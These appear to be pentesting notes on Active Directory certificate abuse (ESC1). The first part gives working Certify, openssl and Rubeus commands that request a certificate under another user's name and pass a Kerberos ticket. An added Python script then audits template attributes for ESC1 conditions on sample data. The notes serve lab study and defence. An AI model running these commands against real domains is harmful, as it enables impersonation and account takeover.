certify

A cool tool for investigating Active Directory certificate abuse.

Find all vulnerable certificate templates

certify.exe find /vulnerable

Abuse ESC1 (example from our lab)

Certify.exe request /ca:tt-dc01.tangent.town\tangent-TT-DC01-CA /template:4lewsers /altname:tommy

Now copy everything from...

-----BEGIN RSA PRIVATE KEY-----

...to...

-----END CERTIFICATE-----

Then save that to a file called cert.pem. Next:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

This will give you the cert.pfx file, which you can use to request a TGT with Rubeus:

Rubeus.exe asktgt /user:ad-user-you-chose-to-impersonate-with-certify.exe-command /certificate:cert.pfx /ptt /nowrap
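
For the defensive side of the ESC1 request above, the following added example (not part of the original notes and not Certify's own code) audits exported certificate template attributes for the combination of settings that lets a requester name another user in the certificate. The template records are constructed sample data, and the enroll_principals key is an assumed field holding the groups resolved from each template's enrollment ACL.

```python
# Added example: ESC1 audit over exported certificate template attributes.
ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
PEND_ALL_REQUESTS = 0x00000002          # bit in msPKI-Enrollment-Flag (manager approval)
AUTH_EKUS = {                           # EKUs usable for domain authentication
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Assumption: groups treated as low-privileged; adjust for your domain.
BROAD_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

def esc1_conditions(t):
    """Map each ESC1 precondition to True/False for one template record."""
    ekus = set(t.get("pKIExtendedKeyUsage", []))
    return {
        "requester supplies subject/SAN":
            bool(t.get("msPKI-Certificate-Name-Flag", 0) & ENROLLEE_SUPPLIES_SUBJECT),
        "authentication EKU or no EKU": not ekus or bool(ekus & AUTH_EKUS),
        "no manager approval":
            not t.get("msPKI-Enrollment-Flag", 0) & PEND_ALL_REQUESTS,
        "no authorized signatures": t.get("msPKI-RA-Signature", 0) == 0,
        "broad enrollment rights":
            bool(set(t.get("enroll_principals", [])) & BROAD_PRINCIPALS),
    }

def audit(templates):
    """Return names of templates meeting every ESC1 precondition at once."""
    return [t["name"] for t in templates if all(esc1_conditions(t).values())]

def _tpl(name, name_flag, enroll_flag, ekus, principals):
    # Helper for the constructed sample records below (hypothetical field layout).
    return {"name": name, "msPKI-Certificate-Name-Flag": name_flag,
            "msPKI-Enrollment-Flag": enroll_flag, "msPKI-RA-Signature": 0,
            "pKIExtendedKeyUsage": ekus, "enroll_principals": principals}

CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
SAMPLE_TEMPLATES = [  # constructed sample data, not from a real directory
    _tpl("ExampleExposed", 0x1, 0x0, [CLIENT_AUTH], ["Domain Users"]),
    _tpl("ExampleNeedsApproval", 0x1, 0x2, [CLIENT_AUTH], ["Domain Users"]),
    _tpl("ExampleSubjectFromAD", 0x02000000, 0x0, [CLIENT_AUTH], ["Domain Users"]),
    _tpl("ExampleAdminsOnly", 0x1, 0x0, [CLIENT_AUTH], ["Domain Admins"]),
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        unmet = [k for k, v in esc1_conditions(t).items() if not v]
        print(t["name"], "ESC1-EXPOSED" if not unmet else f"ok (blocked by: {unmet})")
```

A template is exposed only when every condition holds, so changing any one of them (for example clearing the enrollee-supplies-subject flag or requiring manager approval) removes it from the result.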